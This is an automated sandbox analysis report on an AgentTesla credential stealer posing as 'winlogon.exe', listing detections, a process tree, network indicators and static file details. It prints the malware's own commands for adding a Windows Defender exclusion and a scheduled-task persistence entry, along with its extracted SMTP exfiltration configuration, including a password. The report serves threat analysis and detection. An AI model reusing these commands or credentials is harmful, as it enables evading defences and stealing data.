Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report winlogon.exe

Overview

General Information

Sample Name:winlogon.exe
Analysis ID:532921
MD5:629f5bb8b5ee75e90c393ad9d96a1772
SHA1:b09925a7163bef858657a1b39146fe27abb01f99
SHA256:15637f2d530662c968272c1e6e48ca6a093f0c828edf0cbb5cd32d9af03b3ff5
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Allocates memory in foreign processes
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • winlogon.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\winlogon.exe" MD5: 629F5BB8B5EE75E90C393AD9D96A1772)
    • powershell.exe (PID: 6968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6632 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6284 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m.melendez@stockmeieir.com", "Password": "aU6sb@#1%Efh", "Host": "smtp.stockmeieir.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.0.RegSvcs.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              6.0.RegSvcs.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.winlogon.exe.2bf1b4c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6284
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp, ProcessId: 6632
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, ProcessId: 6968
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6284
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\winlogon.exe" , ParentImage: C:\Users\user\Desktop\winlogon.exe, ParentProcessId: 6768, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe, ProcessId: 6968
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829465297275895.6968.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 6.0.RegSvcs.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m.melendez@stockmeieir.com", "Password": "aU6sb@#1%Efh", "Host": "smtp.stockmeieir.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: winlogon.exeVirustotal: Detection: 24%Perma Link
                      Source: 6.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: winlogon.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: winlogon.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49843 -> 208.91.199.224:587
                      Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
                      Source: global trafficTCP traffic: 192.168.2.4:49843 -> 208.91.199.224:587
                      Source: global trafficTCP traffic: 192.168.2.4:49843 -> 208.91.199.224:587
                      Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmpString found in binary or memory: http://smtp.stockmeieir.com
                      Source: RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpString found in binary or memory: http://wwHpow.com
                      Source: RegSvcs.exe, 00000006.00000002.929225214.0000000002A03000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.929273138.0000000002A4C000.00000004.00000001.sdmpString found in binary or memory: https://Qr1QL48h5BTOb.com
                      Source: RegSvcs.exe, 00000006.00000002.929145314.00000000029AC000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.stockmeieir.com

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 6.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 6.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 6.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 6.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 6.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 6.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE3375034u002d8665u002d4EC5u002dB8E3u002d408FACBEC3C8u007d/u0032F7D2690u002dA8FCu002d441Eu002dBAC6u002d826EE4BE1AC3.csLarge array initialization: .cctor: array initializer size 11963
                      Source: winlogon.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_00F5C5B4
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_00F5E912
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_00F5E918
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_02B94948
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_02B94939
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_02B9E950
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_02B9E94A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E58068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E50040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E55182
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E5AFF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E52796
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E54F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E5BEC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E5BE6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E5F25F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04D846A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04D845B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04D8D261
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF6500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF7118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF6848
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E10040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E1EF00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E1003D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E18282
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 05DFBA98 appears 52 times
                      Source: winlogon.exe, 00000000.00000002.675258722.0000000000846000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCancellationCallbackIn.exe4 vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.679999581.0000000005D70000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOTmdmZgynuRtgcbWTCLvFYfG.exe4 vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.679722660.0000000005290000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs winlogon.exe
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOTmdmZgynuRtgcbWTCLvFYfG.exe4 vs winlogon.exe
                      Source: winlogon.exeBinary or memory string: OriginalFilenameCancellationCallbackIn.exe4 vs winlogon.exe
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe 15637F2D530662C968272C1E6E48CA6A093F0C828EDF0CBB5CD32D9AF03B3FF5
                      Source: winlogon.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: UlhpAjSuVoTa.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: winlogon.exeVirustotal: Detection: 24%
                      Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Users\user\Desktop\winlogon.exeJump to behavior
                      Source: winlogon.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\winlogon.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\winlogon.exe "C:\Users\user\Desktop\winlogon.exe"
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exeJump to behavior
                      Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD7F1.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/8@2/2
                      Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\winlogon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_01
                      Source: C:\Users\user\Desktop\winlogon.exeMutant created: \Sessions\1\BaseNamedObjects\kQBjZXFLomKnbRbGT
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01
                      Source: 6.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.RegSvcs.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\winlogon.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: winlogon.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: winlogon.exe, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: UlhpAjSuVoTa.exe.0.dr, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.winlogon.exe.7d0000.0.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.winlogon.exe.7d0000.0.unpack, GameSettingsWindow.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_00F5E318 push esp; iretd
                      Source: C:\Users\user\Desktop\winlogon.exeCode function: 0_2_00F5D642 pushad ; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E59742 push 8BFFFFFFh; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DFED6B pushfd ; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DFECC3 push esp; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DFEC7B pushad ; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF2188 push edi; retn 0005h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF2157 push esi; retn 0005h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF2147 push ebp; retn 0005h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF210B push edx; retn 0005h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF5BF7 pushad ; retn 0005h
                      Source: winlogon.exeStatic PE information: 0xE54F68FF [Thu Nov 29 14:58:07 2091 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.82547153814
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.82547153814
                      Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exeJump to dropped file

